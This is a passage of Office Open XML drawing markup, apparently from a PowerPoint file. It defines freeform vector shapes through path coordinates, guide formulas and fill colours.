                <a:gd name="T0" fmla="*/ 1 w 43"/>
                <a:gd name="T1" fmla="*/ 36 h 52"/>
                <a:gd name="T2" fmla="*/ 11 w 43"/>
                <a:gd name="T3" fmla="*/ 49 h 52"/>
                <a:gd name="T4" fmla="*/ 26 w 43"/>
                <a:gd name="T5" fmla="*/ 51 h 52"/>
                <a:gd name="T6" fmla="*/ 39 w 43"/>
                <a:gd name="T7" fmla="*/ 41 h 52"/>
                <a:gd name="T8" fmla="*/ 42 w 43"/>
                <a:gd name="T9" fmla="*/ 16 h 52"/>
                <a:gd name="T10" fmla="*/ 32 w 43"/>
                <a:gd name="T11" fmla="*/ 2 h 52"/>
                <a:gd name="T12" fmla="*/ 18 w 43"/>
                <a:gd name="T13" fmla="*/ 0 h 52"/>
                <a:gd name="T14" fmla="*/ 5 w 43"/>
                <a:gd name="T15" fmla="*/ 10 h 52"/>
                <a:gd name="T16" fmla="*/ 1 w 43"/>
                <a:gd name="T17" fmla="*/ 3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52">
                  <a:moveTo>
                    <a:pt x="1" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42"/>
                    <a:pt x="5" y="48"/>
                    <a:pt x="11" y="49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32" y="52"/>
                    <a:pt x="38" y="47"/>
                    <a:pt x="39" y="41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9"/>
                    <a:pt x="39" y="3"/>
                    <a:pt x="32" y="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2" y="0"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="5" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="36"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8A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79" name="Freeform 210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6392B88-3A94-42D3-B866-BB6A7D2F2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7" y="249"/>
              <a:ext cx="102" cy="123"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 43"/>
                <a:gd name="T1" fmla="*/ 36 h 52"/>
                <a:gd name="T2" fmla="*/ 11 w 43"/>
                <a:gd name="T3" fmla="*/ 49 h 52"/>
                <a:gd name="T4" fmla="*/ 26 w 43"/>
                <a:gd name="T5" fmla="*/ 51 h 52"/>
                <a:gd name="T6" fmla="*/ 39 w 43"/>
                <a:gd name="T7" fmla="*/ 41 h 52"/>
                <a:gd name="T8" fmla="*/ 42 w 43"/>
                <a:gd name="T9" fmla="*/ 16 h 52"/>
                <a:gd name="T10" fmla="*/ 33 w 43"/>
                <a:gd name="T11" fmla="*/ 3 h 52"/>
                <a:gd name="T12" fmla="*/ 18 w 43"/>
                <a:gd name="T13" fmla="*/ 1 h 52"/>
                <a:gd name="T14" fmla="*/ 5 w 43"/>
                <a:gd name="T15" fmla="*/ 10 h 52"/>
                <a:gd name="T16" fmla="*/ 1 w 43"/>
                <a:gd name="T17" fmla="*/ 3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52">
                  <a:moveTo>
                    <a:pt x="1" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42"/>
                    <a:pt x="5" y="48"/>
                    <a:pt x="11" y="49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32" y="52"/>
                    <a:pt x="38" y="48"/>
                    <a:pt x="39" y="41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9"/>
                    <a:pt x="39" y="3"/>
                    <a:pt x="33" y="3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2" y="0"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="5" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="36"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8A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80" name="Freeform 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E55D520-EF93-43A9-B88C-00E707281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4" y="1026"/>
              <a:ext cx="838" cy="379"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 354"/>
                <a:gd name="T1" fmla="*/ 5 h 160"/>
                <a:gd name="T2" fmla="*/ 291 w 354"/>
                <a:gd name="T3" fmla="*/ 31 h 160"/>
                <a:gd name="T4" fmla="*/ 326 w 354"/>
                <a:gd name="T5" fmla="*/ 36 h 160"/>
                <a:gd name="T6" fmla="*/ 321 w 354"/>
                <a:gd name="T7" fmla="*/ 71 h 160"/>
                <a:gd name="T8" fmla="*/ 323 w 354"/>
                <a:gd name="T9" fmla="*/ 116 h 160"/>
                <a:gd name="T10" fmla="*/ 354 w 354"/>
                <a:gd name="T11" fmla="*/ 143 h 160"/>
                <a:gd name="T12" fmla="*/ 340 w 354"/>
                <a:gd name="T13" fmla="*/ 160 h 160"/>
                <a:gd name="T14" fmla="*/ 298 w 354"/>
                <a:gd name="T15" fmla="*/ 124 h 160"/>
                <a:gd name="T16" fmla="*/ 271 w 354"/>
                <a:gd name="T17" fmla="*/ 64 h 160"/>
                <a:gd name="T18" fmla="*/ 118 w 354"/>
                <a:gd name="T19" fmla="*/ 42 h 160"/>
                <a:gd name="T20" fmla="*/ 45 w 354"/>
                <a:gd name="T21" fmla="*/ 56 h 160"/>
                <a:gd name="T22" fmla="*/ 16 w 354"/>
                <a:gd name="T23" fmla="*/ 90 h 160"/>
                <a:gd name="T24" fmla="*/ 0 w 354"/>
                <a:gd name="T25" fmla="*/ 75 h 160"/>
                <a:gd name="T26" fmla="*/ 30 w 354"/>
                <a:gd name="T27" fmla="*/ 40 h 160"/>
                <a:gd name="T28" fmla="*/ 74 w 354"/>
                <a:gd name="T29" fmla="*/ 0 h 160"/>
                <a:gd name="T30" fmla="*/ 109 w 354"/>
                <a:gd name="T31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4" h="160">
                  <a:moveTo>
                    <a:pt x="109" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="31"/>
                    <a:pt x="291" y="31"/>
                    <a:pt x="291" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="36"/>
                    <a:pt x="326" y="36"/>
                    <a:pt x="326" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="71"/>
                    <a:pt x="321" y="71"/>
                    <a:pt x="321" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="116"/>
                    <a:pt x="323" y="116"/>
                    <a:pt x="323" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="143"/>
                    <a:pt x="354" y="143"/>
                    <a:pt x="354" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="160"/>
                    <a:pt x="340" y="160"/>
                    <a:pt x="340" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="124"/>
                    <a:pt x="298" y="124"/>
                    <a:pt x="298" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="124"/>
                    <a:pt x="285" y="67"/>
                    <a:pt x="271" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="42"/>
                    <a:pt x="118" y="42"/>
                    <a:pt x="118" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="41"/>
                    <a:pt x="45" y="56"/>
                    <a:pt x="45" y="56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74" y="0"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="74" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="5"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3132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81" name="Freeform 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6420DEAB-424C-4EA2-82D1-2B96A1AA8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9" y="422"/>
              <a:ext cx="1398" cy="704"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10 w 590"/>
                <a:gd name="T1" fmla="*/ 94 h 297"/>
                <a:gd name="T2" fmla="*/ 96 w 590"/>
                <a:gd name="T3" fmla="*/ 63 h 297"/>
                <a:gd name="T4" fmla="*/ 200 w 590"/>
                <a:gd name="T5" fmla="*/ 0 h 297"/>
                <a:gd name="T6" fmla="*/ 200 w 590"/>
                <a:gd name="T7" fmla="*/ 0 h 297"/>
                <a:gd name="T8" fmla="*/ 203 w 590"/>
                <a:gd name="T9" fmla="*/ 0 h 297"/>
                <a:gd name="T10" fmla="*/ 457 w 590"/>
                <a:gd name="T11" fmla="*/ 36 h 297"/>
                <a:gd name="T12" fmla="*/ 460 w 590"/>
                <a:gd name="T13" fmla="*/ 37 h 297"/>
                <a:gd name="T14" fmla="*/ 460 w 590"/>
                <a:gd name="T15" fmla="*/ 37 h 297"/>
                <a:gd name="T16" fmla="*/ 554 w 590"/>
                <a:gd name="T17" fmla="*/ 122 h 297"/>
                <a:gd name="T18" fmla="*/ 590 w 590"/>
                <a:gd name="T19" fmla="*/ 231 h 297"/>
                <a:gd name="T20" fmla="*/ 564 w 590"/>
                <a:gd name="T21" fmla="*/ 237 h 297"/>
                <a:gd name="T22" fmla="*/ 530 w 590"/>
                <a:gd name="T23" fmla="*/ 132 h 297"/>
                <a:gd name="T24" fmla="*/ 457 w 590"/>
                <a:gd name="T25" fmla="*/ 64 h 297"/>
                <a:gd name="T26" fmla="*/ 457 w 590"/>
                <a:gd name="T27" fmla="*/ 64 h 297"/>
                <a:gd name="T28" fmla="*/ 425 w 590"/>
                <a:gd name="T29" fmla="*/ 292 h 297"/>
                <a:gd name="T30" fmla="*/ 417 w 590"/>
                <a:gd name="T31" fmla="*/ 297 h 297"/>
                <a:gd name="T32" fmla="*/ 169 w 590"/>
                <a:gd name="T33" fmla="*/ 262 h 297"/>
                <a:gd name="T34" fmla="*/ 164 w 590"/>
                <a:gd name="T35" fmla="*/ 255 h 297"/>
                <a:gd name="T36" fmla="*/ 196 w 590"/>
                <a:gd name="T37" fmla="*/ 27 h 297"/>
                <a:gd name="T38" fmla="*/ 117 w 590"/>
                <a:gd name="T39" fmla="*/ 79 h 297"/>
                <a:gd name="T40" fmla="*/ 18 w 590"/>
                <a:gd name="T41" fmla="*/ 123 h 297"/>
                <a:gd name="T42" fmla="*/ 0 w 590"/>
                <a:gd name="T43" fmla="*/ 118 h 297"/>
                <a:gd name="T44" fmla="*/ 10 w 590"/>
                <a:gd name="T45" fmla="*/ 94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90" h="297">
                  <a:moveTo>
                    <a:pt x="10" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="94"/>
                    <a:pt x="58" y="113"/>
                    <a:pt x="96" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="7"/>
                    <a:pt x="189" y="1"/>
                    <a:pt x="200" y="0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01" y="0"/>
                    <a:pt x="202" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="0"/>
                    <a:pt x="456" y="36"/>
                    <a:pt x="457" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="458" y="36"/>
                    <a:pt x="459" y="37"/>
                    <a:pt x="460" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="460" y="37"/>
                    <a:pt x="460" y="37"/>
                    <a:pt x="460" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="463" y="39"/>
                    <a:pt x="535" y="75"/>
                    <a:pt x="554" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="167"/>
                    <a:pt x="589" y="228"/>
                    <a:pt x="590" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="237"/>
                    <a:pt x="564" y="237"/>
                    <a:pt x="564" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="237"/>
                    <a:pt x="548" y="175"/>
                    <a:pt x="530" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="518" y="103"/>
                    <a:pt x="476" y="75"/>
                    <a:pt x="457" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="64"/>
                    <a:pt x="457" y="64"/>
                    <a:pt x="457" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="292"/>
                    <a:pt x="425" y="292"/>
                    <a:pt x="425" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="295"/>
                    <a:pt x="421" y="297"/>
                    <a:pt x="417" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="262"/>
                    <a:pt x="169" y="262"/>
                    <a:pt x="169" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="261"/>
                    <a:pt x="163" y="258"/>
                    <a:pt x="164" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="27"/>
                    <a:pt x="196" y="27"/>
                    <a:pt x="196" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="29"/>
                    <a:pt x="149" y="38"/>
                    <a:pt x="117" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="120"/>
                    <a:pt x="45" y="127"/>
                    <a:pt x="18" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="122"/>
                    <a:pt x="5" y="120"/>
                    <a:pt x="0" y="118"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="94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82" name="Freeform 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F26815-4657-4FEF-91BF-533E6C966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1" y="645"/>
              <a:ext cx="93" cy="265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 93"/>
                <a:gd name="T1" fmla="*/ 232 h 265"/>
                <a:gd name="T2" fmla="*/ 34 w 93"/>
                <a:gd name="T3" fmla="*/ 265 h 265"/>
                <a:gd name="T4" fmla="*/ 76 w 93"/>
                <a:gd name="T5" fmla="*/ 241 h 265"/>
                <a:gd name="T6" fmla="*/ 93 w 93"/>
                <a:gd name="T7" fmla="*/ 7 h 265"/>
                <a:gd name="T8" fmla="*/ 48 w 93"/>
                <a:gd name="T9" fmla="*/ 0 h 265"/>
                <a:gd name="T10" fmla="*/ 0 w 93"/>
                <a:gd name="T11" fmla="*/ 232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3" h="265">
                  <a:moveTo>
                    <a:pt x="0" y="232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3148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83" name="Freeform 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16ABD689-B7C5-45B7-86F6-9C7CA133F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3" y="12"/>
              <a:ext cx="671" cy="697"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 283"/>
                <a:gd name="T1" fmla="*/ 237 h 294"/>
                <a:gd name="T2" fmla="*/ 25 w 283"/>
                <a:gd name="T3" fmla="*/ 264 h 294"/>
                <a:gd name="T4" fmla="*/ 220 w 283"/>
                <a:gd name="T5" fmla="*/ 292 h 294"/>
                <a:gd name="T6" fmla="*/ 250 w 283"/>
                <a:gd name="T7" fmla="*/ 272 h 294"/>
                <a:gd name="T8" fmla="*/ 281 w 283"/>
                <a:gd name="T9" fmla="*/ 57 h 294"/>
                <a:gd name="T10" fmla="*/ 257 w 283"/>
                <a:gd name="T11" fmla="*/ 30 h 294"/>
                <a:gd name="T12" fmla="*/ 62 w 283"/>
                <a:gd name="T13" fmla="*/ 3 h 294"/>
                <a:gd name="T14" fmla="*/ 32 w 283"/>
                <a:gd name="T15" fmla="*/ 22 h 294"/>
                <a:gd name="T16" fmla="*/ 1 w 283"/>
                <a:gd name="T17" fmla="*/ 237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3" h="294">
                  <a:moveTo>
                    <a:pt x="1" y="237"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="250"/>
                    <a:pt x="10" y="262"/>
                    <a:pt x="25" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="292"/>
                    <a:pt x="220" y="292"/>
                    <a:pt x="220" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="294"/>
                    <a:pt x="249" y="285"/>
                    <a:pt x="250" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="57"/>
                    <a:pt x="281" y="57"/>
                    <a:pt x="281" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="44"/>
                    <a:pt x="272" y="32"/>
                    <a:pt x="257" y="30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47" y="0"/>
                    <a:pt x="34" y="9"/>
                    <a:pt x="32" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="237"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCDB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84" name="Freeform 215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C999DC1-8D10-4CBF-AFA1-B1775F876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7" y="393"/>
              <a:ext cx="64" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 27"/>
                <a:gd name="T1" fmla="*/ 12 h 27"/>
                <a:gd name="T2" fmla="*/ 12 w 27"/>
                <a:gd name="T3" fmla="*/ 26 h 27"/>
                <a:gd name="T4" fmla="*/ 26 w 27"/>
                <a:gd name="T5" fmla="*/ 16 h 27"/>
                <a:gd name="T6" fmla="*/ 15 w 27"/>
                <a:gd name="T7" fmla="*/ 1 h 27"/>
                <a:gd name="T8" fmla="*/ 1 w 27"/>
                <a:gd name="T9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1" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="12" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="27"/>
                    <a:pt x="25" y="23"/>
                    <a:pt x="26" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="8"/>
                    <a:pt x="22" y="2"/>
                    <a:pt x="15" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="0"/>
                    <a:pt x="2" y="5"/>
                    <a:pt x="1" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0F0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85" name="Freeform 216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC66B5CA-A048-47FF-8844-7C1FCB4D1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3" y="412"/>
              <a:ext cx="16" cy="17"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 7"/>
                <a:gd name="T1" fmla="*/ 3 h 7"/>
                <a:gd name="T2" fmla="*/ 3 w 7"/>
                <a:gd name="T3" fmla="*/ 6 h 7"/>
                <a:gd name="T4" fmla="*/ 7 w 7"/>
                <a:gd name="T5" fmla="*/ 4 h 7"/>
                <a:gd name="T6" fmla="*/ 4 w 7"/>
                <a:gd name="T7" fmla="*/ 0 h 7"/>
                <a:gd name="T8" fmla="*/ 0 w 7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5"/>
                    <a:pt x="1" y="6"/>
                    <a:pt x="3" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="7"/>
                    <a:pt x="7" y="5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86" name="Freeform 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31EBA589-B82B-4615-B3DE-B00EC20DC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7" y="344"/>
              <a:ext cx="66" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 28"/>
                <a:gd name="T1" fmla="*/ 12 h 27"/>
                <a:gd name="T2" fmla="*/ 12 w 28"/>
                <a:gd name="T3" fmla="*/ 26 h 27"/>
                <a:gd name="T4" fmla="*/ 27 w 28"/>
                <a:gd name="T5" fmla="*/ 15 h 27"/>
                <a:gd name="T6" fmla="*/ 16 w 28"/>
                <a:gd name="T7" fmla="*/ 1 h 27"/>
                <a:gd name="T8" fmla="*/ 1 w 28"/>
                <a:gd name="T9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7">
                  <a:moveTo>
                    <a:pt x="1" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="12" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="27"/>
                    <a:pt x="26" y="22"/>
                    <a:pt x="27" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="8"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="16" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="2" y="4"/>
                    <a:pt x="1" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0F0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87" name="Freeform 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7413B2C5-1897-4718-AA7F-E6F952CB3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5" y="491"/>
              <a:ext cx="149" cy="149"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 63"/>
                <a:gd name="T1" fmla="*/ 2 h 63"/>
                <a:gd name="T2" fmla="*/ 5 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 59 w 63"/>
                <a:gd name="T5" fmla="*/ 8 h 63"/>
                <a:gd name="T6" fmla="*/ 63 w 63"/>
                <a:gd name="T7" fmla="*/ 10 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 63"/>
                <a:gd name="T9" fmla="*/ 15 h 63"/>
                <a:gd name="T10" fmla="*/ 22 w 63"/>
                <a:gd name="T11" fmla="*/ 60 h 63"/>
                <a:gd name="T12" fmla="*/ 0 w 63"/>
                <a:gd name="T13" fmla="*/ 6 h 63"/>
                <a:gd name="T14" fmla="*/ 1 w 63"/>
                <a:gd name="T15" fmla="*/ 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3" h="63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59" y="8"/>
                    <a:pt x="59" y="8"/>
                    <a:pt x="59" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="8"/>
                    <a:pt x="62" y="9"/>
                    <a:pt x="63" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="12"/>
                    <a:pt x="63" y="14"/>
                    <a:pt x="62" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="16"/>
                    <a:pt x="42" y="63"/>
                    <a:pt x="22" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="57"/>
                    <a:pt x="0" y="7"/>
                    <a:pt x="0" y="6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7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88" name="Freeform 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C975869-143F-4C3C-985B-F74019967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7" y="19"/>
              <a:ext cx="251" cy="130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 251"/>
                <a:gd name="T1" fmla="*/ 0 h 130"/>
                <a:gd name="T2" fmla="*/ 251 w 251"/>
                <a:gd name="T3" fmla="*/ 36 h 130"/>
                <a:gd name="T4" fmla="*/ 109 w 251"/>
                <a:gd name="T5" fmla="*/ 130 h 130"/>
                <a:gd name="T6" fmla="*/ 0 w 251"/>
                <a:gd name="T7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1" h="130">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="251" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="1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04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89" name="Freeform 220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B9B397-F443-4BE0-BE9F-D1B74C3C6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5" y="360"/>
              <a:ext cx="17" cy="17"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 7"/>
                <a:gd name="T1" fmla="*/ 3 h 7"/>
                <a:gd name="T2" fmla="*/ 3 w 7"/>
                <a:gd name="T3" fmla="*/ 7 h 7"/>
                <a:gd name="T4" fmla="*/ 6 w 7"/>
                <a:gd name="T5" fmla="*/ 4 h 7"/>
                <a:gd name="T6" fmla="*/ 4 w 7"/>
                <a:gd name="T7" fmla="*/ 0 h 7"/>
                <a:gd name="T8" fmla="*/ 0 w 7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5"/>
                    <a:pt x="1" y="7"/>
                    <a:pt x="3" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="7"/>
                    <a:pt x="6" y="6"/>
                    <a:pt x="6" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="2"/>
                    <a:pt x="5" y="1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90" name="Freeform 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{360656C7-0206-4BC5-B0AA-F6683F196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-14"/>
              <a:ext cx="647" cy="874"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 647"/>
                <a:gd name="T1" fmla="*/ 874 h 874"/>
                <a:gd name="T2" fmla="*/ 647 w 647"/>
                <a:gd name="T3" fmla="*/ 874 h 874"/>
                <a:gd name="T4" fmla="*/ 645 w 647"/>
                <a:gd name="T5" fmla="*/ 0 h 874"/>
                <a:gd name="T6" fmla="*/ 0 w 647"/>
                <a:gd name="T7" fmla="*/ 2 h 874"/>
                <a:gd name="T8" fmla="*/ 3 w 647"/>
                <a:gd name="T9" fmla="*/ 874 h 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7" h="874">
                  <a:moveTo>
                    <a:pt x="3" y="874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="647" y="874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00B69F">
                <a:lumMod val="75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91" name="Freeform 222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73581235-1349-4778-B37F-8AD8DFF48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45"/>
              <a:ext cx="559" cy="154"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 559"/>
                <a:gd name="T1" fmla="*/ 154 h 154"/>
                <a:gd name="T2" fmla="*/ 559 w 559"/>
                <a:gd name="T3" fmla="*/ 154 h 154"/>
                <a:gd name="T4" fmla="*/ 559 w 559"/>
                <a:gd name="T5" fmla="*/ 0 h 154"/>
                <a:gd name="T6" fmla="*/ 0 w 559"/>
                <a:gd name="T7" fmla="*/ 2 h 154"/>
                <a:gd name="T8" fmla="*/ 0 w 559"/>
                <a:gd name="T9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9" h="154">
                  <a:moveTo>
